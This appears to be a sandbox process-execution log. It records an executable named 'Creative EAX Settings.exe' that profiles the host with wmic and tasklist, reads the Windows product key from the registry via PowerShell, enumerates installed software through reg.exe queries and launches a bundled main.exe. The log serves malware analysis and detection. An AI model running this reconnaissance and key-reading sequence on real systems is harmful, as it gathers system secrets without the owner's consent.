C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.6.119416380\739274067" -childID 5 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5abf1e20-82a9-49f4-bdde-8acf09bae6c3} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5196 1c97dc64458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.7.820436086\192254592" -childID 6 -isForBrowser -prefsHandle 5392 -prefMapHandle 5396 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0461d9f-6721-4833-9fc6-b1ce49c4889e} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5384 1c97dc66258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.5.965980751\1263529297" -childID 4 -isForBrowser -prefsHandle 5052 -prefMapHandle 4756 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {86d38c95-44c1-4df3-b493-b600e86ba292} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5064 1c97dc65c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.8.737089822\897069053" -childID 7 -isForBrowser -prefsHandle 6108 -prefMapHandle 6112 -prefsLen 29615 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7202710c-ac8f-49b3-bfc1-95a715aa0153} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 3268 1c980f44d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.9.615788110\10310631" -childID 8 -isForBrowser -prefsHandle 5248 -prefMapHandle 5660 -prefsLen 29615 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a80b5eb-4579-44cb-9e75-a1b445edbb51} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5164 1c987376558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.10.91352381\354763682" -childID 9 -isForBrowser -prefsHandle 10072 -prefMapHandle 10076 -prefsLen 29615 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7e7bde7-1158-489b-9c78-df8e99fd841c} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 10064 1c985c0c258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.12.259442315\1847805680" -childID 11 -isForBrowser -prefsHandle 9744 -prefMapHandle 9748 -prefsLen 29694 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e8a12aa-f933-4152-80e5-891a9f744909} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9736 1c982d11e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.11.853087454\368670465" -childID 10 -isForBrowser -prefsHandle 9956 -prefMapHandle 9960 -prefsLen 29694 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20cb32c6-603e-4f03-9986-6541ced0ac74} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9948 1c982d12458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.13.220623817\2028457902" -childID 12 -isForBrowser -prefsHandle 5464 -prefMapHandle 4352 -prefsLen 29694 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4e54f73-a734-4cdd-9d06-99d89dfa9117} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5064 1c9860fce58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.14.1990400373\250972225" -childID 13 -isForBrowser -prefsHandle 5280 -prefMapHandle 5184 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41695172-e908-4538-894c-dcd5f7243027} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5364 1c987978158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.15.537475600\1555614447" -childID 14 -isForBrowser -prefsHandle 9280 -prefMapHandle 5184 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b382a3bf-645d-47b9-9da4-aba9ef2c0c31} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 5180 1c98117a158 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.16.438015319\417930917" -childID 15 -isForBrowser -prefsHandle 9044 -prefMapHandle 9040 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1453aec6-0446-4e26-aacf-d2cee264a588} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9200 1c98117a458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.17.262481326\1567154431" -parentBuildID 20221007134813 -prefsHandle 9044 -prefMapHandle 5188 -prefsLen 29734 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6626a09-1d34-4dd1-b777-8a12492f475d} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 8964 1c987b2b858 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.18.823127594\1161384795" -childID 16 -isForBrowser -prefsHandle 9908 -prefMapHandle 6148 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b101d74-3176-462d-b39c-caa0e50e85f7} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9920 1c984f44558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.19.296941858\11372967" -childID 17 -isForBrowser -prefsHandle 8776 -prefMapHandle 8772 -prefsLen 29734 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8630c467-3424-46d9-9718-014d1f877285} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9652 1c97dc65358 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.20.1452272974\1740447945" -childID 18 -isForBrowser -prefsHandle 1664 -prefMapHandle 5700 -prefsLen 29743 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95433ffb-8067-43a3-9f5b-a0cd4777e605} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 9676 1c982c53f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.21.2061506001\2108231716" -childID 19 -isForBrowser -prefsHandle 9440 -prefMapHandle 9416 -prefsLen 29743 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f1c9928-8945-4010-bb7f-f7a45e647c65} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 2840 1c982c54e58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3116.22.520686563\1083276776" -childID 20 -isForBrowser -prefsHandle 8384 -prefMapHandle 8380 -prefsLen 29743 -prefMapSize 233444 -jsInitHandle 1384 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {815124fa-1ba1-44e9-8298-578585269446} 3116 "\\.\pipe\gecko-crash-server-pipe.3116" 8392 1c9837ab558 tab
C:\Users\Admin\Downloads\processhacker-2.39-setup.exe
"C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"
C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp" /SL5="$20692,1874675,150016,C:\Users\Admin\Downloads\processhacker-2.39-setup.exe"
C:\Program Files\Process Hacker 2\ProcessHacker.exe
"C:\Program Files\Process Hacker 2\ProcessHacker.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\Creative EAX Settings.exe
"C:\Users\Admin\Downloads\Creative EAX Settings.exe"
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1560 --field-trial-handle=1772,5064392763959393394,8550773419608691522,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe
"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1976 --field-trial-handle=1772,5064392763959393394,8550773419608691522,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=NaN get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\resources\app.asar.unpacked\bind\main.exe"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get size
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\more.com
more +1
C:\Windows\system32\more.com
more +1
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\system32\more.com
more +1
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=NaN get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Process_Hacker2_is1""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Process_Hacker2_is1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
C:\Windows\system32\reg.exe
